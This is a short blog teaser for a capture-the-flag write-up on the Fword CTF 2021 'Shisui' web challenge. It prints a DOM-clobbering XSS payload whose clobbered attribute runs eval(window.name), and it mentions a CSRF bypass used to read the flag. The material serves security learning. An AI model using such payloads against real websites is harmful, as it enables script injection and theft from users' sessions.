Shisui - Fword CTF 2021 Yadhu Krishna M 2021-08-30 Web Exploitation tl;dr XSS using DOM Clobbering <a id="showInfos"></a><a id="SETTINGS" name=check data-timezone="aaa" data-location="eval(window.name)"><a id="SETTINGS" name="x"> Bypass CSRF protection to execute XSS and read flag. Read More FwordCTF XSS DOM Clobbering